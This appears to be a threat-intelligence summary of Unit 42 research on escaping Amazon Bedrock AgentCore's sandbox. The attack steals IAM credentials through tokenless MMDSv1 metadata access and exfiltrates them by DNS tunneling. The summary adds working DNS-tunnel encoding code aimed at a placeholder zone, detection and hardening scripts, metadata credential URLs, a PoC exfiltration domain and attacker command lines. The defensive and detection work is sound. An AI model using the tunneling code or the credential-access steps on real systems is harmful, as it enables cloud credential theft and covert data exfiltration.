
Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox

Unit 42 researchers discovered a method to bypass the network isolation of Amazon Bedrock AgentCore's Code Interpreter sandbox using DNS tunneling. Combined with a legacy MMDSv1 configuration that lacked session token enforcement, attackers could potentially exploit SSRF to extract highly privileged IAM credentials and exfiltrate them via the DNS covert channel.

Confidence: high · Analyzed: 2026-04-08 · reports

Authors: Unit 42

Source:Palo Alto Networks


Key Takeaways

  • AWS Bedrock AgentCore's Code Interpreter sandbox mode allowed external data exfiltration and C2 via DNS tunneling, despite being documented as having no external network access.
  • The microVM Metadata Service (MMDS) defaulted to v1, which does not require a session token, so an SSRF in agent code (or the interpreter's own code execution) could read the highly privileged IAM credentials of the role attached to the agent.
  • Undocumented MMDS endpoints leaked internal AWS S3 pre-signed URLs and KMS keys used for backend logging.
  • AWS has updated documentation to reflect limited network access and enforced MMDSv2 for new agents to mitigate the metadata exposure.

Affected Systems

  • Amazon Bedrock AgentCore
  • AgentCore Code Interpreter
  • AgentCore Runtime

Attack Chain

The attacker first reaches the local MMDS endpoint (169.254.169.254) from inside the AgentCore Code Interpreter, either through an SSRF in the agent's code or simply by running code in the interpreter, which is its intended function. Because MMDSv1 does not require a session token, a plain GET returns the IAM credentials of the role attached to the agent. The sandbox blocks direct outbound connections, but it still resolves hostnames through a resolver that recurses out to the public DNS. The attacker therefore encodes the stolen data as subdomains of a domain whose authoritative nameserver they control and triggers lookups for those names: the nameserver receives the query names (uplink) and can return data in its answers (downlink), which gives a bidirectional covert channel usable for both exfiltration and command-and-control (C2).
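The encoding step is where most of the constraints live: a DNS label holds at most 63 characters, a whole name at most 253, resolvers may lowercase names, and queries can be retried or arrive out of order. The following is an added illustration of that mechanism, not code from the Unit 42 write-up; the zone `tunnel.example.invalid`, the session label and the payload are constructed placeholders. It builds the query names on the sender side and reassembles them as the authoritative server would; the one function that would emit real DNS traffic is shown but not called.

```python
import base64
import random
import socket

# RFC 1035 limits: each label is at most 63 octets, a full name at most 253 characters.
MAX_LABEL = 63
MAX_NAME = 253

# Hypothetical attacker-controlled zone; the PoC used a different, real domain.
TUNNEL_ZONE = "tunnel.example.invalid"


def _b32(data: bytes) -> str:
    # Base32 uses only letters and digits and is case-insensitive, so it survives
    # resolvers that lowercase names. Padding is dropped here and restored on decode.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def build_query_names(data: bytes, session_id: str, zone: str = TUNNEL_ZONE) -> list:
    """Split data into names of the form <seq>.<chunk>[.<chunk>...].<session>.<zone>,
    each inside the RFC 1035 limits. The hex sequence label lets the receiver
    reorder queries that arrive out of order or are retried by the resolver."""
    suffix = f".{session_id}.{zone}"
    encoded = _b32(data)
    names, seq, pos = [], 0, 0
    while pos < len(encoded):
        seq_label = f"{seq:04x}"
        # Characters left for data labels; every label also costs one dot.
        budget = MAX_NAME - len(suffix) - len(seq_label)
        labels = []
        while pos < len(encoded) and budget >= 2:
            take = min(MAX_LABEL, budget - 1, len(encoded) - pos)
            labels.append(encoded[pos:pos + take])
            pos += take
            budget -= take + 1
        names.append(".".join([seq_label] + labels) + suffix)
        seq += 1
    return names


def reassemble(observed_names, session_id: str, zone: str = TUNNEL_ZONE) -> bytes:
    """Receiver side: rebuild the payload from query names seen at the
    authoritative nameserver, in any order and with duplicates."""
    suffix = f".{session_id}.{zone}"
    chunks = {}
    for name in observed_names:
        name = name.rstrip(".").lower()
        if not name.endswith(suffix):
            continue  # unrelated query for the zone
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0], 16)] = "".join(labels[1:])  # retries overwrite identically
    if sorted(chunks) != list(range(len(chunks))):
        raise ValueError("gap in sequence numbers; payload incomplete")
    return _unb32("".join(chunks[i] for i in range(len(chunks))))


def send_via_resolver(names):
    """Uplink: one lookup per name. The sandbox's resolver recurses to the zone's
    authoritative server, which logs the names; its answers (A/TXT records) are
    the downlink. Not called by this example, since it would emit real DNS traffic."""
    for name in names:
        try:
            socket.gethostbyname(name)
        except socket.gaierror:
            pass  # NXDOMAIN is fine: the query itself carried the data


if __name__ == "__main__":
    payload = b"constructed-secret-value, not a real credential"
    names = build_query_names(payload, "s1")
    random.shuffle(names)  # simulate out-of-order arrival at the nameserver
    assert reassemble(names, "s1") == payload
    print(len(names), "queries; longest name", max(map(len, names)), "characters")
```

Every name produced here sits at or under the 253-character ceiling with labels of at most 63 characters, which is exactly the shape (one very long, high-entropy label chain under a single apex) the hunting hypotheses below look for.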

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules, but outlines the behavioral mechanisms of the attack for conceptual detection engineering.

Detection Engineering Assessment

  • EDR Visibility: None. This is a managed AWS microVM environment; customers cannot install EDR agents on AgentCore runtimes.
  • Network Visibility: Medium. Customers can monitor DNS logs if using VPC mode with Route 53 Resolver DNS Firewall, but visibility in the default Sandbox mode is limited to the AWS backend.
  • Detection Difficulty: Hard. Requires analyzing DNS query patterns for tunneling and monitoring CloudTrail for anomalous IAM credential usage originating from unexpected IPs.

Required Log Sources

  • AWS CloudTrail
  • Route 53 DNS Query Logs

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Look for unusually long or high-entropy subdomains in DNS queries originating from AWS environments, indicating potential DNS tunneling. | DNS Query Logs | Exfiltration | Medium
Monitor for AWS API calls using IAM roles assigned to Bedrock AgentCore originating from IP addresses outside the expected AWS service ranges. | AWS CloudTrail | Credential Access | Low
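Both hypotheses reduce to a small amount of feature extraction over the two log sources named above. The block below is an added example, not part of the report: it profiles Route 53 Resolver query-log lines per apex domain (label length, entropy of the longest label, number of distinct names) and flags CloudTrail events where a named AgentCore execution role is used from outside an expected address range. The log lines, the role name `AgentCoreExecutionRole`, the CIDR `203.0.113.0/24` and the tunnel zone are all constructed placeholders; the resolver-log field names are modelled on Route 53 Resolver query logging, and the apex is taken crudely as the last two labels, where a production pipeline should use a public-suffix list.

```python
import ipaddress
import json
import math
from collections import defaultdict

# Constructed sample lines modelled on Route 53 Resolver query-log JSON. Not real
# telemetry; the tunnel zone is a placeholder, not the PoC domain.
SAMPLE_DNS_LOGS = [
    '{"query_name":"pypi.org.","query_type":"A","srcaddr":"10.0.1.12"}',
    '{"query_name":"files.pythonhosted.org.","query_type":"A","srcaddr":"10.0.1.12"}',
    '{"query_name":"sts.us-east-1.amazonaws.com.","query_type":"A","srcaddr":"10.0.1.12"}',
    '{"query_name":"0000.ifsw4ylbonzwizlbmnxxezlbnzzwu4q.s1.tunnel.example.invalid.","query_type":"A","srcaddr":"10.0.1.12"}',
    '{"query_name":"0001.krugkidrovl3gyzdfmztwqzjanzqw4ylx.s1.tunnel.example.invalid.","query_type":"A","srcaddr":"10.0.1.12"}',
    '{"query_name":"0002.mzxw6ytboi2hk3tpo5twi3s3nrqw2ylhmfwgk.s1.tunnel.example.invalid.","query_type":"TXT","srcaddr":"10.0.1.12"}',
    '{"query_name":"0003.nfzgk3thmvyhgzlomzygc5lpnzzxi33mn5rq.s1.tunnel.example.invalid.","query_type":"TXT","srcaddr":"10.0.1.12"}',
    '{"query_name":"0004.onzw2zlhmf2hi43umfzgs5dvnvzgc2lomnxw.s1.tunnel.example.invalid.","query_type":"A","srcaddr":"10.0.1.12"}',
]

# Constructed CloudTrail records (subset of fields). Role name and CIDR are placeholders.
SAMPLE_CLOUDTRAIL = [
    {"eventTime": "2026-04-08T10:01:03Z", "eventName": "GetCallerIdentity", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"sessionContext": {"sessionIssuer": {"arn": "arn:aws:iam::111122223333:role/AgentCoreExecutionRole"}}}},
    {"eventTime": "2026-04-08T10:02:11Z", "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"sessionContext": {"sessionIssuer": {"arn": "arn:aws:iam::111122223333:role/AgentCoreExecutionRole"}}}},
    {"eventTime": "2026-04-08T10:02:40Z", "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"sessionContext": {"sessionIssuer": {"arn": "arn:aws:iam::111122223333:role/UnrelatedRole"}}}},
]


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def apex_of(name: str) -> str:
    # Crude apex: last two labels. Use a public-suffix list in production.
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def profile_dns(lines, max_label=30, min_entropy=3.5, min_unique=5):
    """Per-apex tunneling features. A zone is suspicious when any label is
    unusually long, or when many distinct high-entropy names hit the same apex."""
    stats = defaultdict(lambda: {"names": set(), "max_label": 0, "entropies": [], "types": defaultdict(int)})
    for line in lines:
        rec = json.loads(line)
        name = rec["query_name"].rstrip(".").lower()
        labels = name.split(".")
        s = stats[apex_of(name)]
        s["names"].add(name)
        s["max_label"] = max(s["max_label"], max(len(l) for l in labels))
        s["entropies"].append(shannon_entropy(max(labels, key=len)))
        s["types"][rec["query_type"]] += 1
    findings = {}
    for apex, s in stats.items():
        avg_ent = sum(s["entropies"]) / len(s["entropies"])
        suspicious = s["max_label"] >= max_label or (avg_ent >= min_entropy and len(s["names"]) >= min_unique)
        findings[apex] = {"unique_names": len(s["names"]), "max_label": s["max_label"],
                          "avg_entropy": round(avg_ent, 2), "types": dict(s["types"]), "suspicious": suspicious}
    return findings


def anomalous_role_usage(events, role_name, expected_cidrs):
    """CloudTrail events where the given role's credentials were used from an
    address outside expected_cidrs. Non-IP sourceIPAddress values (AWS service
    principals) are skipped here; treat them separately in a real pipeline."""
    nets = [ipaddress.ip_network(c) for c in expected_cidrs]
    hits = []
    for ev in events:
        issuer = ev.get("userIdentity", {}).get("sessionContext", {}).get("sessionIssuer", {}).get("arn", "")
        if not issuer.endswith(f":role/{role_name}"):
            continue
        try:
            ip = ipaddress.ip_address(ev.get("sourceIPAddress", ""))
        except ValueError:
            continue
        if not any(ip in net for net in nets):
            hits.append((ev["eventTime"], ev["eventName"], str(ip)))
    return hits


if __name__ == "__main__":
    for apex, f in profile_dns(SAMPLE_DNS_LOGS).items():
        print(("SUSPICIOUS " if f["suspicious"] else "ok         ") + apex, f)
    print(anomalous_role_usage(SAMPLE_CLOUDTRAIL, "AgentCoreExecutionRole", ["203.0.113.0/24"]))
```

The length and distinct-name thresholds are deliberately conservative; tune them against a baseline of the agent's legitimate lookups (package indexes, AWS service endpoints) before alerting, which is also where the Medium false-positive risk in the table comes from.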

Control Gaps

  • Lack of outbound network filtering for DNS in Sandbox mode
  • Default MMDSv1 allowing unauthenticated local metadata access

Key Behavioral Indicators

  • High volume of DNS TXT or A record queries to a single external domain, with many distinct and unusually long subdomains, from an AI agent environment
  • HTTP GET requests to 169.254.169.254 from agent code without a session token header (the PUT-then-GET token handshake that IMDSv2 and MMDSv2 require)

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Ensure all new AgentCore agents are deployed using MMDSv2.
  • Use the AWS API to disable MMDSv1 on older agents.
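A quick self-check that a team can run from inside its own Code Interpreter session to confirm that tokenless metadata access is really gone, added here as an illustration and not taken from the Unit 42 write-up. It assumes the endpoint lives at 169.254.169.254 with IMDS-style paths, as the IOCs on this page show, and that MMDSv2 uses the IMDSv2 header names; the page does not state the latter, so treat that part as an assumption and adjust if the handshake fails. The transport is injectable so the logic can be exercised against fake endpoints.

```python
import urllib.error
import urllib.request

METADATA = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
# Token handshake as IMDSv2 defines it. Whether AgentCore's MMDSv2 uses these
# exact header names is an assumption of this example.
TOKEN_PATH = "/latest/api/token"
TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aws-ec2-metadata-token"


def http_fetch(method, path, headers=None, timeout=2.0):
    """Minimal transport: returns (status, body); status is None when nothing answers."""
    req = urllib.request.Request(METADATA + path, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def metadata_token_mode(fetch=http_fetch):
    """'v1' if the credentials path answers a tokenless GET (the condition the
    research exploited), 'v2' if tokenless GETs are refused but succeed after a
    token handshake, 'unreachable' if no endpoint answers, otherwise 'unknown'."""
    status, _ = fetch("GET", CREDS_PATH)
    if status is None:
        return "unreachable"
    if status == 200:
        return "v1"
    status, token = fetch("PUT", TOKEN_PATH, {TTL_HEADER: "60"})
    if status == 200 and token:
        status, _ = fetch("GET", CREDS_PATH, {TOKEN_HEADER: token.strip()})
        if status == 200:
            return "v2"
    return "unknown"


def passes_hardening_check(fetch=http_fetch) -> bool:
    """True only when credentials are not readable without a session token."""
    return metadata_token_mode(fetch) != "v1"


if __name__ == "__main__":
    mode = metadata_token_mode()
    print(f"metadata endpoint token mode: {mode}")
    if mode == "v1":
        print("FAIL: credentials readable without a session token; move this runtime to MMDSv2")
```

Run it inside the interpreter of each existing agent, not only new ones: the documentation change and MMDSv2 default described above apply to newly created agents, so older runtimes are the ones most likely to still report `v1`.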

Infrastructure Hardening

  • Use VPC Mode instead of Sandbox mode so that egress, including DNS, is governed by your own security groups, route tables and resolver configuration rather than by the AWS-managed defaults.
  • Implement Amazon Route 53 Resolver DNS Firewall when using VPC Mode to block unauthorized DNS egress.

User Protection

  • Apply the principle of least privilege to IAM roles attached to AI agents.

Security Awareness

  • Educate developers that 'sandbox' environments may still have permeable boundaries like DNS.
  • Treat AI agent environments as potential SSRF vectors.

MITRE ATT&CK Mapping

  • T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
  • T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
  • T1071.004 - Application Layer Protocol: DNS
  • T1528 - Steal Application Access Token

Additional IOCs

  • Domains:
    • my-secret[.]0f812bbe-f15e-41fe-acfa-4308b271fa0a[.]dnshook[.]site - Specific subdomain used in the PoC to exfiltrate the string 'my-secret'.
  • Urls:
    • hxxp://169[.]254[.]169[.]254/latest/meta-data/tags/instance/aws_presigned-log-url - Undocumented MMDS endpoint leaking an internal S3 pre-signed URL.
    • hxxp://169[.]254[.]169[.]254/latest/meta-data/tags/instance/aws_presigned-log-kms-key - Undocumented MMDS endpoint leaking an internal KMS key.
    • hxxp://169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/ - MMDS endpoint used to query attached IAM role credentials.
  • Command Lines:
    • Purpose: Identify the AWS account associated with the leaked Access Key ID. | Tools: aws-cli | Stage: Discovery | aws sts get-access-key-info --access-key-id
    • Purpose: Attempt to write to the internal S3 bucket using the pre-signed URL. | Tools: curl | Stage: Exfiltration | curl -X PUT "https://